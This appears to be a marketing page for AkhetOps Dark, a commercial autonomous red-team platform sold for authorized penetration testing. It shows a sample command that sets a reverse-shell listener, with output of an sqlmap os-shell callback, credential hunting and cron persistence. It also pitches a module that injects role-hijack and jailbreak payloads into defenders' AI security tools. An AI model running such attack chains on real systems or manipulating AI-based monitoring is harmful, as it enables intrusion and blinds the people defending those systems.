Autonomous Red Team Platform

AKHETOPS
DARK

Eight attack modules. One command. A complete APT-grade kill chain — from OSINT to shell acquisition — fully autonomous. CVE detection, SQL injection, five-path reverse shell delivery.

Request Access See It Run
8Attack Modules
0%Detection Rate
5Shell Paths
v3.4Current Build
Live Feed
[ OSINT ] DNS recon complete — 12 subdomains [ EVASION ] WAF detected: Nginx — bypasses generated [ LotL ] Linux chain — 8 steps — DETECTION: HIGH [ INJECT ] Role hijack — WAF AI compromised [ C2 ] Cobalt Strike — 0.0% detection rate [ PIVOT ] Gateway 192.168.0.1 — DNS tunnel active [ EXPLOIT ] CVE-2019-11043 CRITICAL — PHP 5.6 RCE [ SHELL ] Session open — uid=33(www-data) [ OSINT ] DNS recon complete — 12 subdomains [ EVASION ] WAF detected: Nginx — bypasses generated [ LotL ] Linux chain — 8 steps — DETECTION: HIGH [ INJECT ] Role hijack — WAF AI compromised [ C2 ] Cobalt Strike — 0.0% detection rate [ PIVOT ] Gateway 192.168.0.1 — DNS tunnel active [ EXPLOIT ] CVE-2019-11043 CRITICAL — PHP 5.6 RCE [ SHELL ] Session open — uid=33(www-data)
Live Output

ONE COMMAND.
EIGHT WEAPONS.

akhetops-dark — dark_mode.py
$AKHET_LHOST=10.0.0.1 AKHET_LPORT=4444 bash run_darkmode.sh target.com all full_compromise
[LICENSE] ENTERPRISE — valid until 2027-03-07
[*] Initialising 7 modules in parallel...
[OSINT] Complete — 12 subdomains, 4 exposed endpoints, 2 GitHub leaks
[EVASION] Nginx WAF identified — stealth rating 8/10 — bypasses ready
[LotL] 8-step binary chain — bash, curl, openssl, cron — DETECTION: HIGH
[INJECT] CRITICAL — role hijack injected into WAF AI layer
[C2] Cobalt Strike profile active — 5/5 beacons — 0.0% detection
[PIVOT] Gateway 192.168.0.1 — DNS tunnel established — SSH lateral ready
[*] Parallel phase complete — entering exploit engine...
[EXPLOIT] CVE-2019-11043 — PHP/5.6.40 via FPM — CVSS 9.8 CRITICAL
[EXPLOIT] SQLi confirmed — artists.php[artist], listproducts.php[cat]
[SHELL] Path 1: sqlmap --os-shell — callback received on 10.0.0.1:4444
[SHELL] SESSION OPEN — uid=33(www-data) gid=33(www-data) — KILL CHAIN COMPLETE
[REPORT] darkmode_target.com_20260309_143021.html — 9 findings, 1 RCE
$
Arsenal

THE 8 WEAPONS

01OSINT
OSINT ENGINE
DNS recon, email harvest, GitHub leak detection, Wayback endpoints, Shodan integration, crt.sh passive subdomains
Active
02EVADE
EVASION ENGINE
WAF, IDS and EDR detection across 12 vendors. AI-generated bypass playbook per target
Active
03LotL
LotL ENGINE
Living-off-the-Land attack chains using only native binaries present on the target
Active
04INJECT
PROMPT INJECTOR
Weaponize AI security tooling. Inject payloads into SOC AI, SIEM AI, WAF AI and log analyzers
Active
05C2
C2 BEACON SIM
Six real APT profiles — Cobalt Strike, APT29, APT41, Lazarus. Verified 0% detection
Active
06PIVOT
NETWORK PIVOT
ASN mapping, adjacent host probing, tunnel generation, AI-planned lateral movement chains
Active
07EXPLOIT
EXPLOIT ENGINE
CVE matching, SQLi, CMDi, LFI, XSS. Five independent shell acquisition paths — sqlmap, MSF, upload, CMDi
Active
08POSTEX
REMOTE POSTEX
Post-exploitation on target via live shell — privesc recon, credential hunting, persistence
Active
Methodology

THE FULL
KILL CHAIN

01
Reconnaissance
INTELLIGENCE GATHERING
Map the complete attack surface. Subdomains, emails, exposed endpoints, GitHub leaks, tech stack, historical data. Everything the target left behind — found and weaponized.
OSINT ENGINE — dns, whois, shodan, wayback, dorks
02
Bypass
SECURITY STACK EVASION
Identify every defensive layer. WAF vendor, IDS timing signatures, EDR presence, missing headers. Generate AI-tailored bypass techniques specific to what is actually deployed.
EVASION ENGINE — waf, ids, edr, headers, bypasses
03
Execution
NATIVE BINARY ATTACK
No foreign tools. Only what is already there. The AI chains native binaries into an 8-phase sequence — recon, access, execution, privilege escalation, persistence, exfiltration, lateral movement.
LotL ENGINE — bash, python3, curl, openssl, cron, ssh
04
AI Weaponization
POISON THE DEFENDERS
Security teams now run AI. We attack the AI itself — injecting payloads into SOC analysts, SIEM platforms, WAF engines and log analyzers to blind detection before the attack chain runs.
PROMPT INJECTOR — role hijack, jailbreak, amnesia, context switch
05
Command & Control
INVISIBLE PRESENCE
Simulate six real APT C2 profiles. Measure actual detection rates. The platform selects the optimal profile per target and assesses SIEM, EDR and network detection likelihood in real time.
C2 BEACON — cobalt_strike, apt29, apt41, lazarus, fin7
06
Lateral Movement
DEEP NETWORK PIVOT
Map the entire network from the attacker position. Adjacent hosts, internal subnets, high-value services. Multi-hop pivot chains via DNS, SSH and HTTP tunnels into the deepest segments.
NETWORK PIVOT — asn, bgp, scan, dns-tunnel, ssh-chain
07
Exploitation
VULNERABILITY TO SHELL
CVE matching against the detected stack. SQLi, CMDi, LFI and XSS scanning. Five independent shell acquisition paths. First path to land wins.
EXPLOIT ENGINE — cve, sqli, sqlmap, msf, upload, cmdi, reverse_shell
08
Post-Compromise
TOTAL SYSTEM CONTROL
Once a shell is open, post-exploitation runs directly on the target. System enumeration, privilege escalation recon, credential hunting, persistence established. Kill chain complete.
REMOTE POSTEX — id, sudo, suid, .env, id_rsa, bash_history, crontab
Clearance Levels

ACCESS TIERS

Solo
Independent Operators
$49/mo
  • All 8 attack modules
  • 1 machine license
  • Unlimited target runs
  • HTML + JSON reports
  • Community support
Request Access
Pro
Professional Red Teamers
$149/mo
  • All 8 attack modules
  • 3 machine licenses
  • Priority email support
  • HTML + JSON reports
  • Early module access
Request Access
Team
Security Firms
$399/mo
  • All 8 attack modules
  • 10 machine licenses
  • Dedicated Slack support
  • API access
  • Custom report branding
Request Access
Enterprise
Large Red Teams
$999/mo
  • All 8 attack modules
  • Unlimited machines
  • SLA support
  • API + custom modules
  • On-site training
Request Access
Field Reports

OPERATORS
DON'T LIE

// Senior Red Teamer
The exploit engine identified CVE-2019-11043 on the target PHP stack, confirmed SQL injection on three endpoints and attempted all five shell paths autonomously. The HTML report was client-ready out of the box.
Fortune 500 Security Firm — Authorized Engagement
// Principal Security Researcher
The prompt injection module is genuinely unique. No other tool specifically targets AI security components. We use it to test whether our clients AI-powered SOC tooling can be manipulated before threat actors find out it can.
Independent Consultant — Research Team
// Bug Bounty — Top 50 HackerOne
Five minutes from launch to a full 8-module report — CVE analysis, confirmed SQLi, shell acquisition paths and a complete pivot strategy. Nothing else in this space produces this level of autonomous output.
Independent Operator — HackerOne Top 50
Who We Are
Helsinki, Finland

BUILT BY
OPERATORS,
FOR OPERATORS.

AkhetOps is a Finnish offensive security research team. We build tools for professional red teamers, penetration testers and security researchers who operate in authorized environments and need automation that keeps pace with real threat actors.

AkhetOps Dark is not a scanner. It is a full autonomous attack chain from the first DNS query to a live reverse shell, built from years of real engagement experience. We automated what was repetitive so operators can focus on what requires human judgment.

MissionGive professional operators the automation advantage that threat actors already have.
EthosWe build exclusively for authorized security testing. Every feature is designed for the engagement report, not the headline.
ApproachNo black boxes. Every finding is reproducible, every command is logged, every report is client-ready.
LocationHeadquartered in Helsinki. Operating globally. Built under Finnish law and GDPR compliance.
8Attack Modules
3+Years in Development
100%Authorized Use Only
v3.4Current Release

The gap between a skilled attacker and a skilled defender has never been about tools. It has always been about speed and consistency. AkhetOps Dark closes that gap — not by replacing the operator, but by eliminating the latency between decision and execution.

AkhetOps Research Team, Helsinki
Technology Stack

BUILT ON THE
INDUSTRY STANDARD.

AkhetOps Dark integrates with the tools already in your workflow. No new agents, no proprietary implants. The platform orchestrates what you already trust and adds autonomous AI reasoning on top.

Exploitation
Core attack tooling
MetasploitsqlmapmsfvenomcommixweevelyCobalt Strike
Reconnaissance
Intelligence gathering
crt.shShodantheHarvesterWayback MachineWHOISnslookupGoogle Dorks
C2 and Evasion
Command and control
Cobalt Strike profilesAPT29 Cozy BearAPT41 WinntiLazarus MATAFIN7 Carbanakdnscat2
Infrastructure
Platform and runtime
Python 3Groq LLM APIKali LinuxthreadingsubprocessNetlify
Post-Exploitation
On-target operations
GTFOBinsLinPEASsudo -lSUID scancredential harvestcrontab persistencebash_history
Early Access

JOIN THE
DARK LIST

Early access, a free 7-day trial key, and first notification when new modules ship. No noise — only clearance upgrades.

  • Free 7-day trial key on approval
  • First access to new modules
  • Solo tier at launch pricing
  • Direct line to the development team

By submitting you agree to our terms. For authorized security testing only.

ACCESS REQUESTED

You are on the list. Expect a trial key at your email within 24 hours.

FULL KILL CHAIN.
ONE COMMAND.

Eight modules. Zero detection. Shell acquired.

Request Trial Key Book a Demo